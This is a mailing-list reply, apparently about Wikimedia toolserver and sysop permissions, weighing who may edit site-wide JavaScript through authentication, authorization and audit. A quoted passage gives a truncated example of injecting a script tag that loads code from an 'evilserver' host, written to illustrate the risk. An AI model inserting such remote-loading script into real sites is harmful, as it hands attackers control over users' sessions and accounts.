Gregory,
> Domas, it seems you're out of touch with the
> actual current behavior.
ORLY :)
> Right now anyone that can edit the site-wide scripts
> can insert a
> document.write('<script
> src="http://evilserver.comr.com... and the
> script loaded as a result of that can then have ongoing communication
> with the user by itself inserting more script tags, which call a
> callback function with the result data.
"anyone that can edit" is:
- limited to single project
- elected by community
- has an audit trail
please be reminded that security consists of three holy As:
- Authentication
- Authorization
- Audit
Though authentication to toolserver is a very nice one (ssh keys,
etc!), authorization has a slightly too wide scope, and there's no
change auditing.
Sysops are authenticated via HTTP, are authorized to change single
project, and all their actions are logged and monitored.
> So you've made a case for limiting control of the
> proxy functionality
> to sysops... but not more than that.
You miss something.
Any sysop can. Any sysop can also edit the site-wide scripts,
or throw a
script into the MediaWiki ns, thus making it available withjs
project-wide. An ltwiki sysop can't edit enwiki javascript. An ltwiki
toolserver user can affect enwiki.
> And if your concern is "wikipedia account
> integrity" you're wrong to
> dismiss userscripts. Some are very very popular and are used by many
> accounts with elevated rights, for example:
> http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/User:Lupin/popups.js&limit=5000&from=0
This is where I'm happy to deny any kind of cooperation in case any
problems happen.
--
Domas Mituzas --
http://dammit.lt/ -- [[user:midom]]